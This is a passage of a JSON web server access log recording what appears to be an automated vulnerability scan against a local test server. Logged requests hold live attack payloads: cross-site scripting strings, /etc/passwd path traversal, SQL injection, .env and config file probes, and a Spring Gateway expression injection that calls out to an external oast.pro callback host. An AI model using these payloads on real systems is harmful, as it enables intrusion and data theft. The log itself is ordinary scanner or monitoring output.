"request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.0.1.gz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wps/portal/!ut/p/z1/04_Sj9CPykssy0xPLMnMz0vMAfIjo8ziHd3DQgMNnM3N_M1DjA08PX0NgoNcnQwt3Ez1wwkpiAJKG-AAjgb6BbmhigBypoQ7/dz/d5/L2dBISEvZ0FBIS9nQSEh/?uri=nm:oid:Z6_00000000000000A0BR2B300GG2 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.env.old HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /setup.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.044","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /php/change_password.php/%22%3E%3Csvg%2Fonload%3Dalert(1)%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /faces/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.. HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /application.wadl?detail=true HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///apps HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /adm/file.cgi?next_file=%2fetc%2fpasswd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/options-general.php?page=cc-ce-bridge-cp&error=%3Cimg%20src%20onerror=alert(document.domain)%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ovirt-engine/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:11 +0000","request_body":"log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:11 +0000","request_body":"{\x22\x22:1}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /auth/realms/master/clients-registrations/openid-connect HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /html/setup.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wps/portal/!ut/p/z1/04_Sj9CPykssy0xPLMnMz0vMAfIjo8ziDVCAo4FTkJGTsYGBu7uRfjhYgaN7WGiggbO5mb95iLGBp6evQXCQq5OhhZupfhSGfmSToPrxWEBQfxRYSYCHh5mHoYWBj7-RL1DC1y3M2NXCx9jA3RiqAI8ZBbmhEQaZjooABQv7ag!!/dz/d5/L2dBISEvZ0FBIS9nQSEh/dz/d5/L0lJSkdKSUtVSklKQ2dwUkNncFJBL29Od3dBQUFZUUFBRUl3UWxDVTVBQUdNSUtTcEtGTFJ0R0ZvIS80TmxFTklVTVFuRmR1WXBNaFFUVWs1Q2ltcHBBL1o2XzAwMDAwMDAwMDAwMDAwQTBCUjJCMzAwR1YwL1o3XzAwMDAwMDAwMDAwMDAwQTBCUjJCMzAwSU8wL25vcm1hbC9PQ04vWjZfMDAwMDAwMDAwMDAwMDBBMEJSMkIzMDBHRzIvYW8vdGht/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.0.1.lz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.env.www HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?s=/install/index/index HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /module/smartblog/archive?month=1&year=1&day=1%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,(SELECT%20MD5(55555)),NULL,NULL,NULL,NULL,NULL,NULL,NULL--%20- HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /secureader/javax.faces.resource/web.xml?loc=../WEB-INF HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/application.wadl HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /static/../../../a/../../../../etc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///home HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:11 +0000","request_body":"{\x22contentId\x22:\x22786457\x22,\x22macro\x22:{\x22name\x22:\x22widget\x22,\x22body\x22:\x22\x22,\x22params\x22:{\x22url\x22:\x22https://www.viddler.com/v/23464dc5\x22,\x22width\x22:\x221000\x22,\x22height\x22:\x221000\x22,\x22_template\x22:\x22../web.xml\x22}}}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /rest/tinymce/1/macro/preview HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"127.0.0.1", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/options-general.php?page=cc-ce-bridge-cp&error=%3Cimg%20src%20onerror=alert(document.domain)%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ui/vault/auth HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:11 +0000","request_body":"{\x0D\x0A \x22type\x22: \x22fs\x22,\x0D\x0A \x22settings\x22: {\x0D\x0A \x22location\x22: \x22/usr/share/elasticsearch/repo/test\x22\x0D\x0A }\x0D\x0A}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"PUT /_snapshot/test HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"PUT", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wps/portal/!ut/p/z1/04_Sj9CPykssy0xPLMnMz0vMAfIjo8ziDVCAo4FTkJGTsYGBu7uRfjhYgaN7WGiggbO5mb95iLGBp6evQXCQq5OhhZupfhSGfmSToPrxWEBAf0FuaCgAb7VcBA!!/dz/d5/L2dBISEvZ0FBIS9nQSEh/dz/d5/L0lJSkdKSUtVSklKQ2dwUkNncFJBL29Od3dBQUFZUUFBRUl3UWxDVTVBQUdNSUtTcEtGTFJ0R0ZvIS80TmxFTklVTVFuRmR1WXBNaFFUVWs1Q2ltcHBBL1o2XzAwMDAwMDAwMDAwMDAwQTBCUjJCMzAwR1YwL1o3XzAwMDAwMDAwMDAwMDAwQTBCUjJCMzAwSU8wL25vcm1hbC9PQ04vWjZfMDAwMDAwMDAwMDAwMDBBMEJSMkIzMDBHRzIvYW8vdGht/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.0.1.rar HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.env_1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /dc2/admin/auth.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:11 +0000","request_body":"{\x0D\x0A \x22predicates\x22: [\x0D\x0A {\x0D\x0A \x22name\x22: \x22Path\x22,\x0D\x0A \x22args\x22: {\x0D\x0A \x22_genkey_0\x22: \x22/29KBxW7u9EpigN8kSIzOauFnkQy/**\x22\x0D\x0A }\x0D\x0A }\x0D\x0A ],\x0D\x0A \x22filters\x22: [\x0D\x0A {\x0D\x0A \x22name\x22: \x22RewritePath\x22,\x0D\x0A \x22args\x22: {\x0D\x0A \x22_genkey_0\x22: \x22#{T(java.net.InetAddress).getByName(\x5C\x22ca28bc0smpvbbtig07h0zmucc9wqf4xau.oast.pro\x5C\x22)}\x22,\x0D\x0A \x22_genkey_1\x22: \x22/${path}\x22\x0D\x0A }\x0D\x0A }\x0D\x0A ],\x0D\x0A \x22uri\x22: \x22http://127.0.0.1\x22,\x0D\x0A \x22order\x22: 0\x0D\x0A}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /actuator/gateway/routes/29KBxW7u9EpigN8kSIzOauFnkQy HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ampps-admin/index.php?act=login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /secureader/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.. HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPlugin/slideshow.php?randomId=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v1/application.wadl HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /schema HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?ids[0,updatexml(0,concat(0xa,user()),0)]=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin-ajax.php?action=heateor_sss_sharing_count&urls[%3Cimg%20src%3dx%20onerror%3dalert(document.domain)%3E]= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:11 +0000","request_body":"{\x0D\x0A \x22type\x22: \x22fs\x22,\x0D\x0A \x22settings\x22: {\x0D\x0A \x22location\x22: \x22/usr/share/elasticsearch/repo/test/snapshot-backdata\x22\x0D\x0A }\x0D\x0A}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"PUT /_snapshot/test2 HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"PUT", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wps/portal/!ut/p/z1/pZHBDoIwDIYfqZVF4DoIEg5KBEHWi9mBIAnbjCEefHqH8SARJNGe2qRf_78tEFRAWt7aRvat0bKztSD3hKPgGGROwBDjEuH4bOBxWewx9NzUOzBMki3mWRSs_M0a6IN_n_Ti5wRiZ4Kf0J9r8PEXfmTwL_0Sl_YXlvfm-CRFKLS5KvuJHAgoDXeL9wKSBkR_VkPa6QZEra1N-rrJcKglqxdV2KjuEVM-czP-AKyJL-g!/dz/d5/L2dBISEvZ0FBIS9nQSEh/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.0.1.tar.gz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.env_sample HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /auth.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:11 +0000","request_body":"{\x0D\x0A \x22predicate\x22: \x22Paths: [/29KBxW7u9EpigN8kSIzOauFnkQy], match trailing slash: true\x22,\x0D\x0A \x22route_id\x22: \x2229KBxW7u9EpigN8kSIzOauFnkQy\x22,\x0D\x0A \x22filters\x22: [\x0D\x0A \x22[[RewritePath #{T(java.net.InetAddress).getByName(\x5C\x22ca28bc0smpvbbtig07h07xz8i9chxbb9c.oast.pro\x5C\x22)} = /${path}], order = 1]\x22\x0D\x0A ],\x0D\x0A \x22uri\x22: \x22http://127.0.0.1\x22,\x0D\x0A \x22order\x22: 0\x0D\x0A}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /actuator/gateway/refresh HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v2/application.wadl HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /myaccount/javax.faces.resource/web.xml?loc=../WEB-INF HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:11 +0000","request_body":"system.listMethods","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /xmlrpc.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /_snapshot/test/backdata%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.1.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /crx/de/setPreferences.jsp;%0A.html?language=en&keymap=//a HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?m=user&c=Users&a=logout&referurl=https://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", 